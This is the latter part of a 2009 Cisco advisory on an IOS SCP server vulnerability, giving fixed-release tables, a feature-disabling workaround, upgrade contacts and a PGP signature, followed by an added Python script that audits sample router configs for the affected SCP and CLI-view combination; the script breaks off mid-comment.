|------------+------------------------------------+-----------------|
| 12.2SEC    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SED    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SEE    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SEF    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SEG    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
|            | 12.2(52)SG; Available on           | 12.2(52)SG;     |
| 12.2SG     | 15-MAY-2009                        | Available on    |
|            |                                    | 15-MAY-2009     |
|------------+------------------------------------+-----------------|
| 12.2SGA    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SL     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SM     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SO     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SQ     | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.2SRA    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
|            |                                    | 12.2(33)SRC4;   |
|            |                                    | Available on    |
|            |                                    | 18-MAY-2009     |
| 12.2SRB    | Vulnerable; first fixed in 12.2SRC |                 |
|            |                                    | 12.2(33)SRB5a;  |
|            |                                    | Available on    |
|            |                                    | 3-April-2009    |
|------------+------------------------------------+-----------------|
|            | 12.2(33)SRC4; Available on         | 12.2(33)SRC4;   |
| 12.2SRC    | 18-MAY-2009                        | Available on    |
|            |                                    | 18-MAY-2009     |
|------------+------------------------------------+-----------------|
| 12.2SRD    | 12.2(33)SRD1                       | 12.2(33)SRD1    |
|------------+------------------------------------+-----------------|
| 12.2STE    | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.2SU     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SV     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SVA    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SVC    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SVD    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SVE    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SW     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SX     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SXA    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SXB    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SXD    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SXE    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SXF    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SXH    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SXI    | 12.2(33)SXI1                       | 12.2(33)SXI1    |
|------------+------------------------------------+-----------------|
| 12.2SY     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SZ     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2T      | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2TPC    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XA     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XB     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XC     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XD     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XE     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XF     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XG     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XH     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XI     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XJ     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XK     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XL     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XM     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
|            |                                    | 12.2(33)SB4     |
|            |                                    |                 |
|            |                                    | 12.2(33)SRD1    |
| 12.2XN     | Vulnerable; first fixed in 12.2SRC |                 |
|            |                                    | 12.2(33)SRC4;   |
|            |                                    | Available on    |
|            |                                    | 18-MAY-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.2(33)SRD1    |
|            |                                    |                 |
| 12.2XNA    | Vulnerable; first fixed in 12.2SRD | 12.2(33)SRC4;   |
|            |                                    | Available on    |
|            |                                    | 18-MAY-2009     |
|------------+------------------------------------+-----------------|
| 12.2XNB    | 12.2(33)XNB3                       | 12.2(33)XNB3    |
|------------+------------------------------------+-----------------|
| 12.2XNC    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XO     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XQ     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XR     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XS     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XT     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XU     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XV     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2XW     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YA     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YB     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YC     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YD     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YE     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YF     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YG     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YH     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YJ     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YK     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YL     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YM     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YN     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YO     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YP     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YQ     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YR     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YS     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YT     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YU     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YV     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YW     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YX     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YY     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2YZ     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZA     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZB     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZC     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZD     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZE     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZF     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZG     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZH     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZJ     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZL     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZP     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZU     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZX     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZY     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2ZYA    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| Affected   |                                    | Recommended     |
| 12.3-Based | First Fixed Release                | Release         |
| Releases   |                                    |                 |
|------------+------------------------------------+-----------------|
| 12.3       | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.3B      | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.3BC     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.3BW     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.3EU     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.3JA     | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.3JEA    | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.3JEB    | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.3JEC    | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3JK     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
| 12.3JL     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.3JX     | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3T      | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
| 12.3TPC    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.3VA     | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.3XA     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.3XB     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.3XC     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.3XD     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.3XE     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.3XF     | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3XG     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
| 12.3XI     | Vulnerable; first fixed in 12.2SB  | 12.2(33)SB4     |
|------------+------------------------------------+-----------------|
| 12.3XJ     | Vulnerable; first fixed in 12.3YX  | 12.3(14)YX14    |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3XK     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3XL     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3XQ     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(18e)       |
|            |                                    |                 |
| 12.3XR     | Vulnerable; first fixed in 12.4    | 12.4(23a);      |
|            |                                    | Available on    |
|            |                                    | 30-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3XS     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3XU     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
| 12.3XW     | Vulnerable; first fixed in 12.3YX  | 12.3(14)YX14    |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3XX     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3XY     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
| 12.3XZ     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3YA     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3YD     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
| 12.3YF     | Vulnerable; first fixed in 12.3YX  | 12.3(14)YX14    |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3YG     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3YH     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3YI     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3YJ     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3YK     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
| 12.3YM     | 12.3(14)YM13                       | 12.3(14)YM13    |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3YQ     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3YS     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3YT     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3YU     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
| 12.3YX     | 12.3(14)YX14                       | 12.3(14)YX14    |
|------------+------------------------------------+-----------------|
| 12.3YZ     | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.3ZA     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
| Affected   |                                    | Recommended     |
| 12.4-Based | First Fixed Release                | Release         |
| Releases   |                                    |                 |
|------------+------------------------------------+-----------------|
|            | 12.4(18e)                          | 12.4(18e)       |
|            |                                    |                 |
| 12.4       | 12.4(23a); Available on            | 12.4(23a);      |
|            | 30-APR-2009                        | Available on    |
|            |                                    | 30-APR-2009     |
|------------+------------------------------------+-----------------|
| 12.4JA     | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.4JDA    | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.4JK     | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.4JL     | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.4JMA    | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.4JMB    | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.4JX     | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.4MD     | 12.4(11)MD7                        | 12.4(11)MD7     |
|------------+------------------------------------+-----------------|
| 12.4MR     | 12.4(19)MR2                        | 12.4(19)MR2     |
|------------+------------------------------------+-----------------|
| 12.4SW     | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
|            | 12.4(24)T                          |                 |
|            |                                    | 12.4(22)T1      |
|            | 12.4(20)T2                         |                 |
| 12.4T      |                                    | 12.4(15)T9;     |
|            | 12.4(22)T1                         | Available on    |
|            |                                    | 29-APR-2009     |
|            | 12.4(15)T9; Available on           |                 |
|            | 29-APR-2009                        |                 |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.4XA     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.4XB     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.4XC     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            | 12.4(4)XD12; Available on          | 12.4(4)XD12;    |
| 12.4XD     | 27-MAR-2009                        | Available on    |
|            |                                    | 27-MAR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.4XE     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.4XF     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            | 12.4(20)T2                         |                 |
| 12.4XG     |                                    | 12.4(15)T9;     |
|            | 12.4(22)T1                         | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.4XJ     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.4XK     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            | Releases prior to 12.4(15)XL4 are  |                 |
| 12.4XL     | vulnerable, release 12.4(15)XL4    | 12.4(15)XL4     |
|            | and later are not vulnerable;      |                 |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.4XM     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
| 12.4XN     | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.4XP     | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.4XQ     | 12.4(15)XQ2                        | 12.4(15)XQ2     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.4XR     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.4XT     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
| 12.4XV     | Vulnerable; contact TAC            |                 |
|------------+------------------------------------+-----------------|
| 12.4XW     | 12.4(11)XW10                       | 12.4(11)XW10    |
|------------+------------------------------------+-----------------|
|            |                                    | 12.4(22)T1      |
|            |                                    |                 |
| 12.4XY     | Vulnerable; first fixed in 12.4T   | 12.4(15)T9;     |
|            |                                    | Available on    |
|            |                                    | 29-APR-2009     |
|------------+------------------------------------+-----------------|
| 12.4XZ     | 12.4(15)XZ2                        | 12.4(15)XZ2     |
|------------+------------------------------------+-----------------|
| 12.4YA     | 12.4(20)YA2                        | 12.4(20)YA3     |
|------------+------------------------------------+-----------------|
| 12.4YB     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.4YD     | Not Vulnerable                     |                 |
+-------------------------------------------------------------------+

Workarounds
==========
If the Cisco IOS SCP server functionality is not needed then the
vulnerability described in this document can be mitigated by
disabling the SCP server or the CLI view feature. The SCP server can
be disabled by executing the following command in global
configuration mode:

    no ip scp server enable

If the SCP server cannot be disabled due to operational concerns,
then no workarounds exist. The risk posed by this vulnerability can
be mitigated by following the best practices detailed in "Cisco Guide
to Harden Cisco IOS Devices" at 
http://www.cisco.com/en/US/tech/tk648/tk361/technologies_tech_note09186a0080120f48.shtml
Please refer to the Obtaining Fixed Software section of this advisory
for appropriate solutions to resolve this vulnerability.

Due to the nature of this vulnerability, networking best practices
like access control lists (ACLs) and Control Plane Policing (CoPP)
that restrict access to a device to certain IP addresses or
subnetworks may not be effective. If access is already granted to a
specific IP address or subnetwork, a user with low privileges will be
able to establish an SCP session with the device, which would allow
the user to exploit this vulnerability.

Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at 
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as
otherwise set forth at Cisco.com Downloads at 
http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone 
numbers, and instructions and e-mail addresses for use in various 
languages.

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

This vulnerability was reported to Cisco by Kevin Graham. Cisco would
like to thank Mr. Graham for reporting this vulnerability and working
with us towards coordinated disclosure of the vulnerability.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at :

http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+---------------------------------------+
| Revision |               | Initial    |
| 1.0      | 2009-March-25 | public     |
|          |               | release    |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco 
security notices. All Cisco security advisories are available at 
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAknKUbQACgkQ86n/Gc8U/uBoggCdGbEAh9pGrV/ApbhENou5MF4M
vTIAn03h9J//T0V6BZBxwwS2hKs/JIXi
=JGEE
-----END PGP SIGNATURE-----
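
The Workarounds section of the Cisco advisory above states that the issue is mitigated by disabling either the SCP server or the CLI view feature, and that ACLs restricting access may not be effective. The following is an added example, not part of the advisory or of any Cisco tool: it audits saved running-config text for that combination. The sample configurations, hostnames and function names are constructed for illustration, `parser view` is assumed to be how CLI views appear in the configuration, and the script does not compare the IOS release against the fixed-software table.

```python
import re

# Constructed running-config excerpts for illustration; not from real devices.
SAMPLE_CONFIGS = {
    "edge-rtr-1": """\
version 12.4
hostname edge-rtr-1
aaa new-model
ip scp server enable
!
parser view NOC-READONLY
 secret 5 <redacted>
 commands exec include show version
!
line vty 0 4
 access-class 10 in
 transport input ssh
""",
    "edge-rtr-2": """\
version 12.4
hostname edge-rtr-2
no ip scp server enable
parser view NOC-READONLY
 commands exec include show version
""",
    "core-sw-1": """\
version 12.4
hostname core-sw-1
ip scp server enable
line vty 0 4
 transport input ssh
""",
}

SCP_ON = re.compile(r"^ip scp server enable$")
SCP_OFF = re.compile(r"^no ip scp server enable$")
CLI_VIEW = re.compile(r"^parser view (\S+)")   # assumed marker for a CLI view
VTY_ACL = re.compile(r"^access-class \S+ in\b")


def audit_ios_config(text):
    """Return SCP-server / CLI-view findings for one running-config."""
    scp_enabled, views, vty_acl = False, [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("!"):
            continue  # skip blank lines and IOS comment separators
        if SCP_ON.match(line):
            scp_enabled = True
        elif SCP_OFF.match(line):
            scp_enabled = False  # an explicit disable wins if it appears later
        else:
            m = CLI_VIEW.match(line)
            if m:
                views.append(m.group(1))
            elif VTY_ACL.match(line):
                vty_acl = True

    # Either feature being off is the advisory's mitigation, so a device is
    # flagged only when both are present. The vty ACL is reported but does
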